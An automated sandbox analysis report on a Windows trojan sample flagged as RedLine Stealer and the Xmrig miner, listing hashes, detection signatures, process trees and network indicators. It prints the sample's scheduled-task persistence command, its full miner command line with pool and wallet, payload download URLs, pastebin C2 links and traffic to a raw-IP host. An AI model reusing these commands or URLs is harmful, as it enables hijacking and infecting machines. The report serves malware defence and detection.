Analysis Report SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781 (renamed file extension from 7781 to exe)
Analysis ID: 356837
MD5: bc584a3be92cfdfda79446372fffa46d
SHA1: 6f7d11b7c795bd1f48a078f05d8a4c5600448a03
SHA256: 8086d2b05316a9b44f55971a6c90da8ecb069d075973654f5f914229dc3070f6

Detection

Threat names: RedLine, Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Binary contains a suspicious time stamp
Connects to a pastebin service (likely for C&C)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hides threads from debuggers
Machine Learning detection for dropped file
May check the online IP address of the machine
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe (PID: 2100 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe' MD5: BC584A3BE92CFDFDA79446372FFFA46D)
    • pg2bsuqa.exe (PID: 6124 cmdline: 'C:\Users\user\AppData\Local\pg2bsuqa.exe' MD5: 70DCA411445D3B4394D9C467BF3FF994)
    • zmql3v0y.exe (PID: 4012 cmdline: 'C:\Users\user\AppData\Local\zmql3v0y.exe' MD5: F0ECEFED65B00699CC2B57BF81492F56)
      • schtasks.exe (PID: 6484 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cpu.exe (PID: 6624 cmdline: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1 MD5: E95F766A3748042EFBF0F05D823F82B7)
        • conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • RantimeBroker.exe (PID: 6552 cmdline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe MD5: F0ECEFED65B00699CC2B57BF81492F56)
  • RantimeBroker.exe (PID: 1632 cmdline: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe MD5: F0ECEFED65B00699CC2B57BF81492F56)
  • cleanup

Malware Configuration

Threatname: Xmrig

{"WALLET": "42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j", "POOL": "pool.minexmr"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\Windows\CPU\config.json | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth | 0x35a9:$s1: stratum+tcp://
00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp | CoinMiner_Strings | Detects mining pool protocol string in Executable | Florian Roth | 0x5250:$s1: stratum+tcp://; 0x52e0:$s1: stratum+tcp://; 0x847f:$s1: stratum+tcp://; 0xa523:$s1: stratum+tcp://
00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
(14 further table entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
6.2.zmql3v0y.exe.b30000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
15.2.RantimeBroker.exe.d80000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Xmrig
Source: Process started
Author: Joe Security
Data:
  • Command: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
  • CommandLine: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
  • CommandLine|base64offset|contains: (empty)
  • Image: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
  • NewProcessName: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
  • OriginalFileName: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
  • ParentCommandLine: 'C:\Users\user\AppData\Local\zmql3v0y.exe'
  • ParentImage: C:\Users\user\AppData\Local\zmql3v0y.exe
  • ParentProcessId: 4012
  • ProcessCommandLine: 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
  • ProcessId: 6624

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://blog.agencia10x.com/dance.exe | Avira URL Cloud: Label: malware
Source: https://blog.agencia10x.com/mex.exe | Avira URL Cloud: Label: malware
Found malware configuration
Source: cpu.exe.6624.16.memstr | Malware Configuration Extractor: Xmrig {"WALLET": "42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j", "POOL": "pool.minexmr"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Metadefender: Detection: 21%
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\zmql3v0y.exe | ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | Metadefender: Detection: 16%
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe | ReversingLabs: Detection: 60%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Metadefender: Detection: 21%
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | ReversingLabs: Detection: 28%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe | Joe Sandbox ML: detected

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Source: Yara match | File source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.328721362.0000000003CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000003.324849643.0000020FCC35B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.282484459.0000000001AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.317443395.00000000015F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000003.318537012.0000000003391000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: cpu.exe PID: 6624, type: MEMORY
Source: Yara match | File source: Process Memory Space: zmql3v0y.exe PID: 4012, type: MEMORY
Source: Yara match | File source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORY
Source: Yara match | File source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, type: DROPPED
Source: Yara match | File source: 6.2.zmql3v0y.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 15.2.RantimeBroker.exe.d80000.0.unpack, type: UNPACKEDPE
Detected Stratum mining protocol
Source: global traffic | TCP traffic: 192.168.2.5:49731 -> 88.99.193.240:4444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42zyh6myztcdlqfmcpscggn8ppdku4pk16kh8uffytesddfwt5ihd2qfsws2bgnuwxwfnrtbjbr5w7dqgebrzdjcuzia53j./","pass":"x","agent":"xmrig/6.8.0 (windows nt 10.0; win64; x64) libuv/1.40.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}}
Found strings related to Crypto-Mining
Source: zmql3v0y.exe | String found in binary or memory: -o stratum+tcp://
Source: zmql3v0y.exe | String found in binary or memory: pool.minexmr.com:4444

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb | source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: WinRing0x64.sys.6.dr

Networking:

Connects to a pastebin service (likely for C&C)
Source: unknown | DNS query: name: pastebin.com
May check the online IP address of the machine
Source: unknown | DNS query: name: iplogger.org
Source: global traffic | TCP traffic: 192.168.2.5:49731 -> 88.99.193.240:4444
Source: global traffic | HTTP traffic detected: GET /cpu.zip HTTP/1.1 | Host: 195.2.84.91 | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 104.23.99.190 104.23.99.190
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: global traffic | HTTP traffic detected:
HTTP/1.1 200 OK
Server: nginx
Date: Tue, 23 Feb 2021 16:37:53 GMT
Content-Type: application/zip
Content-Length: 6296834
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Sat, 20 Feb 2021 21:11:22 GMT
ETag: "601502-5bbcb02b93280"
Accept-Ranges: bytes
Data Raw: 50 4b 03 04 14 00 00 00 08 00 01 7a 3a 52 67 77 19 1f bf 02 00 00 e3 08 00 00 0b 00 00 00 63 6f 6e 66 69 67 2e 6a 73 6f 6e ad 56 c9 6e db 30 10 bd e7 2b 02 9d 43 d7 76 e1 16 e8 2d 40 72 4b 51 20 69 51 14 45 61 8c a9 b1 c4 9a e2 b0 43 ca 4b 8b fc 7b 49 79 89 44 d3 45 0e 95 01 43 9a c7 19 3d 3e ce a2 3f 57 d7 e1 2a c0 aa e2 c3 f5 fe a1 33 a8 32 3c 9b 56 eb 9b 17 db 86 78 85 2c 4e 50 87 3c ef 17 14 b5 f7 76 18 02 0d 2c 34 c6 c5 4b d0 0e 7b 81 6a 72 3e 98 8b c9 f4 fd 68 1c 7e 93 a2 07 5a e2 08 8e 7b 26 90 12 9d 13 9e 56 68 ce 69 31 3a cf 4a fa ee 55 9e 5b 1c f0 82 d6 93 83 35 1e b0 83 75 01 72 55 31 b5 26 a1 57 48 d2 c4 6e bf f8 68 f3 ca eb c4 9f c1 94 d4 6c 13 cd 8c 8a cc c5 e4 66 68 13 b0 de 4e 53 a0 a1 32 c6 ec f8 f5 b7 3f a9 16 c2 42 85 2e a3 1b 97 8d e3 01 91 ce bc e1 ac 59 82 ac 71 fe 8b 72 91 4c db c0 b9 87 93 0c 5e d6 16 ca b9 65 5c 62 b8 9f 1f 78 4e 06 a2 4a db 5e 3a eb 24 64 dd 56 78 da cf 45 4c fc 54 3e 97 27 1b 01 e8 ce 4f dc b2 22 56 7e 77 8e 34 d8 10 ef 84 25 d2 99 78 3b 85 3a c3 b1 81 ad f0 35 23 94 4e d4 ca 44 26 93 f1 20 ff 5c 73 ee 05 5c 91 99 0a d5 58 9d f0 e8 3c 3c d3 62 e3 45 8c ed d4 ef 28 e1 6c d6 8f 29 cd 9b 71 86 a2 34 42 2b 8f 59 6c 05 1b 4b 9b 23 30 38 10 b2 68 a4 7e 6d fd 75 99 71 be 23 4d 50 22 67 e4 d6 e0 97 c4 51 83 e2 f6 e3 5d 3f 5b a1 d4 99 c4 fb c7 d6 fa 5b 1b a6 54 5b c2 6b f9 5f 22 6a d6 cd ff a2 53 92 01 8f 42 e3 1a 63 c8 c9 d0 4c eb d0 07 2d d3 76 d7 c3 34 55 62 a9 34 0e 78 15 31 15 63 0a 7f 3f bd f9 65 8b dd 02 d0 15 ed 5d 0e 2e 2f 0c 49 99 3c d2 72 24 75 60 33 5a 4f 47 db 86 55 35 92 d4 7c 78 1b ae 22 5d ee 3a b5 8a 6f 9f be 3c ce bf de 3e 3c dc 7f 9e df de dd 3d de 3f 3d a5 4b 2d b8 c8 b6 d8 a6 40 88 2f 4e 9d 3f c1 8c 92 58 83 ab 8f 4a 26 f0 0a d1 82 56 6b bc 80 5f 6a 1e 1d e8 3b f5 96 19 b7 80 04 bd 4d 85 6c 79 5f b5 19 6a 25 84 8e 60 2e 44 70 24 57 6e 96 77 74 a8 97 22 fc a1 f4 fd 71 17 af e7 ee ee c7 f1 80 e3 cb 85 57 4d dc de bb 43 89 17 35 82 f6 b5 c8 83 65 a3 92 71 82 61 82 75 9d 6e d6 b3 84 3e 06 e1 e8 7a 56 b7 73 21 cb 92 91 e5 b5 7b 6d e1 84 94 f5 24 f7 09 99 d4 8e 44 f6 79 eb 7c 85 99 4e 2b 95 ad 91 dd 45 a0 0d b5 95 41 cb 30 5d 18 9a dc 17 44 cc 52 11 a6 41 72 94 45 a8 b5 05 75 32 1c f5 db c4 29 35 54 b0 53 4a 90 11 0b f0 1e 79 77 2a ea e7 ab bf 50 4b 03 04 14 00 00 00 08 00 54 22 55 52 75 cb 47 e4 24 f1 5f 00 a8 20 69 00 07 00 00 00 63 70 75 2e 65 78 65 ec 5a 67 38 9c c1 16 5e bd f7 1e ac 2e da 25 11 2d 08 bb ca ea bd 5b 96 d5 3b 57 09 82 20 08 a2 13 bd 44 59 9d e8 65 b5 25 88 84 10 82 88 16 36 ba 10 5c d1 89 bb dc de ef cf fb e3 ce b3 fb 9c ef 9b 79 e7 cc 99 73 e6 9d 6f bf 39 ab 65 9e 0c c0 01 00 00 b8 98 ef f5 35 00 d0 0e f8 43 01 01 fe 73 b9 87 05 00 90 b3 75 90 03 9a 89 46 39 da b1 34 47 39 0c 9d 9c 7d d8 bd bc 3d 1d b
Source: unknown | DNS traffic detected: queries for: iplogger.org
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | String found in binary or memory: http://195.2.84.91/amd.zip
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | String found in binary or memory: http://195.2.84.91/cpu.zip
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | String found in binary or memory: http://195.2.84.91/nvidia.zip
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: WinRing0x64.sys.6.dr | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: WinRing0x64.sys.6.dr | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: WinRing0x64.sys.6.dr | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: WinRing0x64.sys.6.dr | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: pg2bsuqa.exe.0.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: pg2bsuqa.exe.0.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.com
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ocsp.digicert.com0H
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ocsp.digicert.com0I
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ocsp.digicert.com0P
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp, pg2bsuqa.exe.0.dr | String found in binary or memory: http://ocsp.sectigo.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ocsp.thawte.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://s.symcd.com06
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp | String found in binary or memory: https://blog.agencia10x.com/dance.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp | String found in binary or memory: https://blog.agencia10x.com/dance.exed
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: https://blog.agencia10x.com/mex.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: https://blog.agencia10x.com4
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp | String found in binary or memory: https://blog.agencia10x.comD8
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: https://d.symcb.com/rpa0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe | String found in binary or memory: https://d.symcb.com/rpa0.
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | String found in binary or memory: https://iplogger.org/1r2et7
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp | String found in binary or memory: https://iplogger.org/1tsef7
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/WmBNYXYN
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com/raw/bnxCb5RP
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp | String found in binary or memory: https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283839555.00000000032C8000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.com4
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp | String found in binary or memory: https://pastebin.comD8
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283801731.00000000032C0000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: pg2bsuqa.exe.0.drString found in binary or memory: https://sectigo.com/CPS0D
              Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exeString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
